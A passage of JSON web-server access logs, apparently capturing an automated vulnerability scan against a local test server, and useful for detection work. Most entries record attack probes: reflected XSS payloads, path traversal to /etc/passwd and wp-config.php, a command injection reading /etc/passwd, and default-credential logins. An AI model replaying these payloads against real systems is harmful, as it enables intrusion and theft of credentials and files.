"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmlcode/html/indexdefault.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=http://127.0.0.1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/script%3E?page=securimage-wp-options%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/projects HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /guest_auth/guestIsUp.php","status":"400","body_bytes_sents":"154","req_time":"0.480","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adfs/ls/idpinitiatedsignon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbaas_monitor/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/test/test.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl?detail=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"29KAniHsb3KhRK9R8zXs6JfZlEj","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /fileserver/test.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 